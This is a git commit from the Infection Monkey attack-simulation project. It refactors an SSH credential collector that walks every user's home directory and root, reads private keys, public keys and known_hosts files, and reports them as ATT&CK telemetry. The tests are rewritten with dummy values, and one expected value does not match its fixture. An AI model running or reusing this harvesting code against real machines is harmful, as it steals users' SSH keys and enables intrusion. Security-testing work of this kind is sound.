Agent, UT: Separate ssh_handler from SSH Credential Collector

* Add different UTs based on what ssh_handler returns
* Fix logic in SSH Credential Collector
This commit is contained in:
Ilija Lazoroski 2022-02-15 14:56:58 +01:00
parent 5aa5e33356
commit e9e5e95f49
8 changed files with 194 additions and 203 deletions

View File

@ -1,17 +1,13 @@
import glob
import logging
import os
import pwd
from typing import Dict, Iterable
from typing import Dict, Iterable, List
from common.utils.attack_utils import ScanStatus
from infection_monkey.credential_collectors import (
Credentials,
ICredentialCollector,
SSHKeypair,
Username,
)
from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
from infection_monkey.credential_collectors.ssh_collector import ssh_handler
logger = logging.getLogger(__name__)
@ -21,121 +17,32 @@ class SSHCollector(ICredentialCollector):
SSH keys and known hosts collection module
"""
default_dirs = ["/.ssh/", "/"]
def collect_credentials(self) -> Credentials:
def collect_credentials(self, _options=None) -> List[Credentials]:
logger.info("Started scanning for SSH credentials")
home_dirs = SSHCollector._get_home_dirs()
ssh_info = SSHCollector._get_ssh_files(home_dirs)
ssh_info = ssh_handler.get_ssh_info()
logger.info("Scanned for SSH credentials")
return SSHCollector._to_credentials(ssh_info)
@staticmethod
def _to_credentials(ssh_info: Iterable[Dict]) -> Credentials:
credentials_obj = Credentials(identities=[], secrets=[])
def _to_credentials(ssh_info: Iterable[Dict]) -> List[Credentials]:
ssh_credentials = []
for info in ssh_info:
credentials_obj.identities.append(Username(info["name"]))
credentials_obj = Credentials(identities=[], secrets=[])
if "name" in info and info["name"] != "":
credentials_obj.identities.append(Username(info["name"]))
ssh_keypair = {}
if "public_key" in info:
ssh_keypair["public_key"] = info["public_key"]
if "private_key" in info:
ssh_keypair["private_key"] = info["private_key"]
if "public_key" in info:
ssh_keypair["known_hosts"] = info["known_hosts"]
for key in ["public_key", "private_key", "known_hosts"]:
if key in info and info.get(key) is not None:
ssh_keypair[key] = info[key]
credentials_obj.secrets.append(SSHKeypair(ssh_keypair))
if len(ssh_keypair):
credentials_obj.secrets.append(SSHKeypair(ssh_keypair))
return credentials_obj
if credentials_obj.identities != [] or credentials_obj.secrets != []:
ssh_credentials.append(credentials_obj)
@staticmethod
def _get_home_dirs() -> Iterable[Dict]:
root_dir = SSHCollector._get_ssh_struct("root", "")
home_dirs = [
SSHCollector._get_ssh_struct(x.pw_name, x.pw_dir)
for x in pwd.getpwall()
if x.pw_dir.startswith("/home")
]
home_dirs.append(root_dir)
return home_dirs
@staticmethod
def _get_ssh_struct(name: str, home_dir: str) -> Dict:
"""
Construct the SSH info. It consisted of: name, home_dir,
public_key, private_key and known_hosts.
public_key: contents of *.pub file (public key)
private_key: contents of * file (private key)
known_hosts: contents of known_hosts file(all the servers keys are good for,
possibly hashed)
:param name: username of user, for whom the keys belong
:param home_dir: users home directory
:return: SSH info struct
"""
return {
"name": name,
"home_dir": home_dir,
"public_key": None,
"private_key": None,
"known_hosts": None,
}
@staticmethod
def _get_ssh_files(usr_info: Iterable[Dict]) -> Iterable[Dict]:
for info in usr_info:
path = info["home_dir"]
for directory in SSHCollector.default_dirs:
if os.path.isdir(path + directory):
try:
current_path = path + directory
# Searching for public key
if glob.glob(os.path.join(current_path, "*.pub")):
# Getting first file in current path with .pub extension(public key)
public = glob.glob(os.path.join(current_path, "*.pub"))[0]
logger.info("Found public key in %s" % public)
try:
with open(public) as f:
info["public_key"] = f.read()
# By default private key has the same name as public,
# only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
with open(private) as f:
# no use from ssh key if it's encrypted
private_key = f.read()
if private_key.find("ENCRYPTED") == -1:
info["private_key"] = private_key
logger.info("Found private key in %s" % private)
T1005Telem(
ScanStatus.USED, "SSH key", "Path: %s" % private
).send()
else:
continue
except (IOError, OSError):
pass
# By default, known hosts file is called 'known_hosts'
known_hosts = os.path.join(current_path, "known_hosts")
if os.path.exists(known_hosts):
try:
with open(known_hosts) as f:
info["known_hosts"] = f.read()
logger.info("Found known_hosts in %s" % known_hosts)
except (IOError, OSError):
pass
# If private key found don't search more
if info["private_key"]:
break
except (IOError, OSError):
pass
except OSError:
pass
usr_info = [
info
for info in usr_info
if info["private_key"] or info["known_hosts"] or info["public_key"]
]
return usr_info
return ssh_credentials

View File

@ -0,0 +1,112 @@
import glob
import logging
import os
import pwd
from typing import Dict, Iterable
from common.utils.attack_utils import ScanStatus
from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
logger = logging.getLogger(__name__)
DEFAULT_DIRS = ["/.ssh/", "/"]
def get_ssh_info() -> Iterable[Dict]:
home_dirs = _get_home_dirs()
ssh_info = _get_ssh_files(home_dirs)
return ssh_info
def _get_home_dirs() -> Iterable[Dict]:
root_dir = _get_ssh_struct("root", "")
home_dirs = [
_get_ssh_struct(x.pw_name, x.pw_dir) for x in pwd.getpwall() if x.pw_dir.startswith("/home")
]
home_dirs.append(root_dir)
return home_dirs
def _get_ssh_struct(name: str, home_dir: str) -> Dict:
"""
Construct the SSH info. It consisted of: name, home_dir,
public_key, private_key and known_hosts.
public_key: contents of *.pub file (public key)
private_key: contents of * file (private key)
known_hosts: contents of known_hosts file(all the servers keys are good for,
possibly hashed)
:param name: username of user, for whom the keys belong
:param home_dir: users home directory
:return: SSH info struct
"""
# TODO: There may be multiple public keys for a single user
# TODO: Authorized keys are missing.
return {
"name": name,
"home_dir": home_dir,
"public_key": None,
"private_key": None,
"known_hosts": None,
}
def _get_ssh_files(usr_info: Iterable[Dict]) -> Iterable[Dict]:
for info in usr_info:
path = info["home_dir"]
for directory in DEFAULT_DIRS:
# TODO: Use PATH
if os.path.isdir(path + directory):
try:
current_path = path + directory
# Searching for public key
if glob.glob(os.path.join(current_path, "*.pub")):
# TODO: There may be multiple public keys for a single user
# Getting first file in current path with .pub extension(public key)
public = glob.glob(os.path.join(current_path, "*.pub"))[0]
logger.info("Found public key in %s" % public)
try:
with open(public) as f:
info["public_key"] = f.read()
# By default, private key has the same name as public,
# only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
with open(private) as f:
# no use from ssh key if it's encrypted
private_key = f.read()
if private_key.find("ENCRYPTED") == -1:
info["private_key"] = private_key
logger.info("Found private key in %s" % private)
T1005Telem(
ScanStatus.USED, "SSH key", "Path: %s" % private
).send()
else:
continue
except (IOError, OSError):
pass
# By default, known hosts file is called 'known_hosts'
known_hosts = os.path.join(current_path, "known_hosts")
if os.path.exists(known_hosts):
try:
with open(known_hosts) as f:
info["known_hosts"] = f.read()
logger.info("Found known_hosts in %s" % known_hosts)
except (IOError, OSError):
pass
# If private key found don't search more
if info["private_key"]:
break
except (IOError, OSError):
pass
except OSError:
pass
usr_info = [
info
for info in usr_info
if info["private_key"] or info["known_hosts"] or info["public_key"]
]
return usr_info

View File

@ -1,3 +0,0 @@
-----BEGIN OPENSSH PRIVATE KEY-----
LoremIpsumSomethingNothing
-----END OPENSSH PRIVATE KEY-----

View File

@ -1 +0,0 @@
ssh-ed25519 something-public-here valid.email@at-email.com

View File

@ -1,4 +0,0 @@
|1|really+known+host|known_host1
|1|really+known+host|known_host2
|1|really+known+host|known_host3
|1|really+known+host|known_host4

View File

@ -1 +0,0 @@
ssh-ed25519 something-public-here valid.email@at-email.com

View File

@ -1,94 +1,75 @@
import os
import pwd
from pathlib import Path
import pytest
from infection_monkey.credential_collectors import SSHKeypair, Username
from infection_monkey.credential_collectors import Credentials, SSHKeypair, Username
from infection_monkey.credential_collectors.ssh_collector import SSHCollector
@pytest.fixture
def project_name(pytestconfig):
home_dir = str(Path.home())
return "/" / Path(str(pytestconfig.rootdir).replace(home_dir, ""))
@pytest.fixture
def ssh_test_dir(project_name):
return project_name / "monkey" / "tests" / "data_for_tests" / "ssh_info"
@pytest.fixture
def get_username():
return pwd.getpwuid(os.getuid()).pw_name
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
def test_ssh_credentials_collector_success(ssh_test_dir, get_username, monkeypatch):
def patch_ssh_handler(ssh_creds, monkeypatch):
monkeypatch.setattr(
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
[str(ssh_test_dir / "ssh_info_full")],
"infection_monkey.credential_collectors.ssh_collector.ssh_handler.get_ssh_info",
lambda: ssh_creds,
)
ssh_credentials = SSHCollector().collect_credentials()
assert len(ssh_credentials.identities) == 1
assert type(ssh_credentials.identities[0]) == Username
assert "username" in ssh_credentials.identities[0].content
assert ssh_credentials.identities[0].content["username"] == get_username
def test_ssh_credentials_empty_results(monkeypatch):
patch_ssh_handler([], monkeypatch)
collected = SSHCollector().collect_credentials()
assert [] == collected
assert len(ssh_credentials.secrets) == 1
assert type(ssh_credentials.secrets[0]) == SSHKeypair
ssh_creds = [
{"name": "", "home_dir": "", "public_key": None, "private_key": None, "known_hosts": None}
]
patch_ssh_handler(ssh_creds, monkeypatch)
expected = []
collected = SSHCollector().collect_credentials()
assert expected == collected
assert len(ssh_credentials.secrets[0].content) == 3
assert (
ssh_credentials.secrets[0]
.content["private_key"]
.startswith("-----BEGIN OPENSSH PRIVATE KEY-----")
def test_ssh_info_result_parsing(monkeypatch):
ssh_creds = [
{
"name": "ubuntu",
"home_dir": "/home/ubuntu",
"public_key": "SomePublicKeyUbuntu",
"private_key": "ExtremelyGoodPrivateKey",
"known_hosts": "MuchKnownHosts",
},
{
"name": "mcus",
"home_dir": "/home/mcus",
"public_key": "AnotherPublicKey",
"private_key": "NotSoGoodPrivateKey",
"known_hosts": None,
},
{
"name": "",
"home_dir": "/",
"public_key": None,
"private_key": None,
"known_hosts": "VeryGoodHosts1",
},
]
patch_ssh_handler(ssh_creds, monkeypatch)
# Expected credentials
username = Username("ubuntu")
username2 = Username("mcus")
ssh_keypair1 = SSHKeypair(
{
"public_key": "SomePublicKeyUbuntu",
"private_key": "ExtremelyGoodPrivateKey",
"known_hosts": "MuchKnownHosts",
}
)
assert (
ssh_credentials.secrets[0]
.content["public_key"]
.startswith("ssh-ed25519 something-public-here")
ssh_keypair2 = SSHKeypair(
{"public_key": "AnotherPublicKey", "private_key": "NotSoGoodPrivateKey"}
)
assert ssh_credentials.secrets[0].content["known_hosts"].startswith("|1|really+known+host")
ssh_keypair3 = SSHKeypair({"known_hosts": "VeryGoodHosts"})
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
def test_no_ssh_credentials(monkeypatch):
monkeypatch.setattr(
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs", []
)
ssh_credentials = SSHCollector().collect_credentials()
assert len(ssh_credentials.identities) == 0
assert len(ssh_credentials.secrets) == 0
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
def test_ssh_collector_partial_credentials(monkeypatch, ssh_test_dir):
monkeypatch.setattr(
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
[str(ssh_test_dir / "ssh_info_partial")],
)
ssh_credentials = SSHCollector().collect_credentials()
assert len(ssh_credentials.secrets[0].content) == 3
assert ssh_credentials.secrets[0].content["private_key"] is None
assert ssh_credentials.secrets[0].content["known_hosts"] is None
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
def test_ssh_collector_no_public_key(monkeypatch, ssh_test_dir):
monkeypatch.setattr(
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
[str(ssh_test_dir / "ssh_info_no_public_key")],
)
ssh_credentials = SSHCollector().collect_credentials()
assert len(ssh_credentials.identities) == 0
assert len(ssh_credentials.secrets) == 0
expected = [
Credentials(identities=[username], secrets=[ssh_keypair1]),
Credentials(identities=[username2], secrets=[ssh_keypair2]),
Credentials(identities=[], secrets=[ssh_keypair3]),
]
collected = SSHCollector().collect_credentials()
assert expected == collected